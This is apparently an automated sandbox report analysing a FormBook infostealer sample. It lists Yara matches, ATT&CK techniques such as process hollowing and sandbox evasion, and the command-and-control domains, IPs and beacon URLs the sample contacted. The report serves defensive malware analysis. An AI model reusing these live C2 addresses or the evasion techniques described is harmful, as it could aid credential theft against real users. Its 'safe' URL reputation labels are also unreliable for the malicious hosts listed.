          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000000.311724441.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.312038510.00000000011E0000.00000002.00020000.sdmp, cscript.exe, 0000000A.00000002.559531956.0000000002FC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.320927407.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Users\user\Desktop\CtTYTpaAKA.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Masquerading1 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | System Information Discovery112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing11 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Behavior Graph

          Behavior Graph ID: 510401 | Sample: CtTYTpaAKA.exe | Startdate: 27/10/2021 | Architecture: WINDOWS | Score: 100

          Start
          • DNS/IP info: www.qywyfeo8.xyz, www.mask60.com, mask60.com
          • Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
            CtTYTpaAKA.exe (started)
            • Created file: C:\Users\user\AppData\...\CtTYTpaAKA.exe.log, ASCII (dropped)
            • Signatures: Tries to detect virtualization through RDTSC time measurements
              CtTYTpaAKA.exe (started)
              • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                explorer.exe (injected)
                • DNS/IP info: www.rdoi.top 104.233.161.241, 49786, 80 PEGTECHINCUS United States; www.sosoon.store 18.118.119.183, 49811, 80 MIT-GATEWAYSUS United States; 11 other IPs or domains
                • Signatures: System process connects to network (likely due to code injection or exploit)
                  cscript.exe (started)
                  • Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)
                      conhost.exe (started)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner
          CtTYTpaAKA.exe | 13% | Virustotal

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.0.CtTYTpaAKA.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.2.CtTYTpaAKA.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.CtTYTpaAKA.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.CtTYTpaAKA.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner
          megacinema.club | 0% | Virustotal

          URLs

          Source | Detection | Scanner | Label
          http://www.isshinn1.com/fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa | 0% | Avira URL Cloud | safe
          http://www.thedusi.com/fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ | 0% | Avira URL Cloud | safe
          www.esyscoloradosprings.com/fqiq/ | 0% | Avira URL Cloud | safe
          http://www.passiverewardssystems.com/fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE | 0% | Avira URL Cloud | safe
          http://www.megacinema.club/fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg | 0% | Avira URL Cloud | safe
          http://www.24000words.com/fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE | 0% | Avira URL Cloud | safe
          http://www.rdoi.top/fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE | 0% | Avira URL Cloud | safe
          http://www.sosoon.store/fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 | 0% | Avira URL Cloud | safe
          http://www.healthyweekendtips.com/fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ | 0% | Avira URL Cloud | safe
          http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
          http://www.esyscoloradosprings.com/fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Reputation
          www.passiverewardssystems.com | 203.170.80.253 | true | true | unknown
          www.rdoi.top | 104.233.161.241 | true | true | unknown
          megacinema.club | 45.93.101.51 | true | true | unknown
          www.isshinn1.com | 157.7.107.193 | true | true | unknown
          www.sosoon.store | 18.118.119.183 | true | true | unknown
          www.24000words.com | 156.240.150.22 | true | true | unknown
          thedusi.com | 34.102.136.180 | true | false | unknown
          www.healthyweekendtips.com | 172.67.216.2 | true | true | unknown
          mask60.com | 116.212.126.191 | true | true | unknown
          websites076.homestead.com | 108.167.135.122 | true | false | high
          www.esyscoloradosprings.com | unknown | unknown | true | unknown
          www.mask60.com | unknown | unknown | true | unknown
          www.qywyfeo8.xyz | unknown | unknown | true | unknown
          www.megacinema.club | unknown | unknown | true | unknown
          www.creationslazzaroni.com | unknown | unknown | true | unknown
          www.thedusi.com | unknown | unknown | true | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.isshinn1.com/fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa | true | Avira URL Cloud: safe | unknown
          http://www.thedusi.com/fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ | false | Avira URL Cloud: safe | unknown
          www.esyscoloradosprings.com/fqiq/ | true | Avira URL Cloud: safe | low
          http://www.passiverewardssystems.com/fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE | true | Avira URL Cloud: safe | unknown
          http://www.megacinema.club/fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg | true | Avira URL Cloud: safe | unknown
          http://www.24000words.com/fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE | true | Avira URL Cloud: safe | unknown
          http://www.rdoi.top/fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE | true | Avira URL Cloud: safe | unknown
          http://www.sosoon.store/fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 | true | Avira URL Cloud: safe | unknown
          http://www.healthyweekendtips.com/fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ | true | Avira URL Cloud: safe | unknown
          http://www.esyscoloradosprings.com/fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css | cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmp | false | | high
          http://www.collada.org/2005/11/COLLADASchema9Done | CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          https://pepabo.com/ | cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmp | false | | high

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          157.7.107.193 | www.isshinn1.com | Japan | 7506 | INTERQGMOInternetIncJP | true
          172.67.216.2 | www.healthyweekendtips.com | United States | 13335 | CLOUDFLARENETUS | true
          108.167.135.122 | websites076.homestead.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
          203.170.80.253 | www.passiverewardssystems.com | Australia | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | true
          156.240.150.22 | www.24000words.com | Seychelles | 328608 | Africa-on-Cloud-ASZA | true
          18.118.119.183 | www.sosoon.store | United States | 3 | MIT-GATEWAYSUS | true
          34.102.136.180 | thedusi.com | United States | 15169 | GOOGLEUS | false
          104.233.161.241 | www.rdoi.top | United States | 54600 | PEGTECHINCUS | true
          45.93.101.51 | megacinema.club | Germany | 40065 | CNSERVERSUS | true

          General Information

          Joe Sandbox Version: 33.0.0 White Diamond
          Analysis ID: 510401
          Start date: 27.10.2021
          Start time: 19:12:07
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 10m 40s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: CtTYTpaAKA.exe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed: 23
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.evad.winEXE@7/1@12/9
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 10.8% (good quality ratio 9.6%)
          • Quality average: 72.4%
          • Quality standard deviation: 32.2%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 80
          • Number of non-executed functions: 149
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 20.50.102.62, 20.54.110.249, 40.91.112.76, 40.112.88.60, 80.67.82.235, 80.67.82.242
          • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Not all processes were analyzed; the report is missing behavior information

          Simulations

          Behavior and APIs

          Time | Type | Description
          19:13:02 | API Interceptor | 2x Sleep call for process: CtTYTpaAKA.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            157.7.107.193sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • www.isshinn1.com/fqiq/?Pbu=IbAhXpax&i48l=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8YomPo1w412d
                                             172.67.216.2 | 2u2u8wnrrW.exe | malicious
                                             • www.healthyweekendtips.com/fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX
                                             108.167.135.122 | vx55dc0wIv.exe | malicious
                                             • www.esyscoloradosprings.com/fqiq/?mJEhrX=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PSHA2k2y9Lk&s2JD=cFNDC4_po
                                             108.167.135.122 | CONTRACT 18639.xlsx | malicious
                                             • www.esyscoloradosprings.com/fqiq/?9ru=0nUtrL7PKd04iT&dVuxZRHH=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==
                                             108.167.135.122 | CONTRACT 18641.xlsx | malicious
                                             • www.esyscoloradosprings.com/fqiq/?1bft=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&m6Gd=YR-dILR0AVm
                                             108.167.135.122 | DMS210949 MV LYDERHORN LOW MIX RATIO.xlsx | malicious
                                             • www.esyscoloradosprings.com/fqiq/?c0=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&c2MXRn=tzuHZ0-p5d904
                                             108.167.135.122 | PI Alu Circle_Dt. 14.05.2021.xlsx | malicious
                                             • www.esyscoloradosprings.com/fqiq/?m0=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&Z0G8=jhqLW0YxgjI
                                             108.167.135.122 | XCFqu9rd3Q.exe | malicious
                                             • www.esyscoloradosprings.com/fqiq/?9r=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&lxoxn=-Z44Jj
                                             108.167.135.122 | mkjnI5hbhI.exe | malicious
                                             • www.esyscoloradosprings.com/fqiq/?aJBX0=PzuD_l&IN643ZF0=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PSHA2k2y9Lk
                                             108.167.135.122 | T7huuSvQv4.exe | malicious
                                             • www.esyscoloradosprings.com/fqiq/?T48d=f2MHm2U&Y6Upd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PSHA2k2y9Lk
                                             108.167.135.122 | ZHANGZHOU YIHANSHENG HOUSEWARES.xlsx | malicious
                                             • www.esyscoloradosprings.com/fqiq/?AV38jb=KZhYdxsFX4Cy5huCrksKfhNe7DL7yKRLCyuZj4rSbKSeqpNQJyJA+bfY/q+7bWQF98eUdg==&exoP_6=9raXztspjfNlRrw0
                                             108.167.135.122 | CXVlBV2Bya.exe | malicious
                                             • www.esyscoloradosprings.com/fqiq/?f0GxZ=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&9rM=SL04qF
                                             108.167.135.122 | sLtLgOtoPA.exe | malicious
                                             • www.esyscoloradosprings.com/fqiq/?i48l=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&Pbu=IbAhXpax
                                             108.167.135.122 | 2u2u8wnrrW.exe | malicious
                                             • www.esyscoloradosprings.com/fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw==
                                             108.167.135.122 | divpCHa0h7.exe | malicious
                                             • www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS

                                            Domains

                                             Match | Associated Sample Name / URL | Detection | Context
                                             www.rdoi.top | CONTRACT 18639.xlsx | malicious
                                             • 104.233.161.241
                                             www.rdoi.top | PI Alu Circle_Dt. 14.05.2021.xlsx | malicious
                                             • 104.233.161.241
                                             www.passiverewardssystems.com | DMS210949 MV LYDERHORN LOW MIX RATIO.xlsx | malicious
                                             • 203.170.80.253
                                             www.passiverewardssystems.com | mkjnI5hbhI.exe | malicious
                                             • 203.170.80.253
                                             www.passiverewardssystems.com | ZHANGZHOU YIHANSHENG HOUSEWARES.xlsx | malicious
                                             • 203.170.80.253
                                             www.passiverewardssystems.com | CXVlBV2Bya.exe | malicious
                                             • 203.170.80.253
                                             www.passiverewardssystems.com | triage_dropped_file.exe | malicious
                                             • 203.170.80.253
                                             www.isshinn1.com | sLtLgOtoPA.exe | malicious
                                             • 157.7.107.193
                                             www.healthyweekendtips.com | T7huuSvQv4.exe | malicious
                                             • 104.21.78.41
                                             www.healthyweekendtips.com | 2u2u8wnrrW.exe | malicious
                                             • 172.67.216.2
                                             www.sosoon.store | tzdVV2W5et.exe | malicious
                                             • 18.118.119.183
                                             www.sosoon.store | 4OlVYrynpO.exe | malicious
                                             • 18.118.119.183
                                             www.sosoon.store | XCFqu9rd3Q.exe | malicious
                                             • 18.118.119.183
                                             www.sosoon.store | T7huuSvQv4.exe | malicious
                                             • 51.81.185.94
                                             www.sosoon.store | sLtLgOtoPA.exe | malicious
                                             • 51.81.185.94
                                             www.24000words.com | 2u2u8wnrrW.exe | malicious
                                             • 156.240.150.22
                                             www.24000words.com | bGOw6FuOUA.exe | malicious
                                             • 156.240.150.22
                                             websites076.homestead.com | vx55dc0wIv.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | CONTRACT 18639.xlsx | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | CONTRACT 18641.xlsx | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | DMS210949 MV LYDERHORN LOW MIX RATIO.xlsx | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | PI Alu Circle_Dt. 14.05.2021.xlsx | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | XCFqu9rd3Q.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | mkjnI5hbhI.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | T7huuSvQv4.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | ZHANGZHOU YIHANSHENG HOUSEWARES.xlsx | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | CXVlBV2Bya.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | sLtLgOtoPA.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | triage_dropped_file.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | PO 4910007391 CHANGZHOU.xlsx | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | t8MQow7sN9.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | 2u2u8wnrrW.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | ClgNlmU3Is.exe | malicious
                                             • 108.167.135.122
                                             websites076.homestead.com | divpCHa0h7.exe | malicious
                                             • 108.167.135.122

                                            ASN

                                             Match | Associated Sample Name / URL | Detection | Context
                                             INTERQGMOInternetIncJP | SHIPPING DOCUMENT.xlsx | malicious
                                             • 150.95.255.38
                                             INTERQGMOInternetIncJP | F9ObnUc4ol.exe | malicious
                                             • 118.27.122.187
                                             INTERQGMOInternetIncJP | DHL_119040 receipt document,pdf.exe | malicious
                                             • 150.95.219.218
                                             INTERQGMOInternetIncJP | n7gjtO4ZwD.exe | malicious
                                             • 118.27.122.92
                                             INTERQGMOInternetIncJP | F30AGnBthja6Ka2.exe | malicious
                                             • 150.95.255.38
                                             INTERQGMOInternetIncJP | PFD33mzc5l | malicious
                                             • 118.27.80.204
                                             INTERQGMOInternetIncJP | comingback.exe | malicious
                                             • 118.27.122.217
                                             INTERQGMOInternetIncJP | MV ANACAPA LIGHT.xlsx | malicious
                                             • 118.27.122.214
                                             INTERQGMOInternetIncJP | cyberantix-PayroLL-997263-pdf.HtML | malicious
                                             • 150.95.219.148
                                             INTERQGMOInternetIncJP | cyberantix-PayroLL-997263-pdf.HtML | malicious
                                             • 150.95.219.148
                                             INTERQGMOInternetIncJP | 8jfOcvTqQA | malicious
                                             • 163.44.189.209
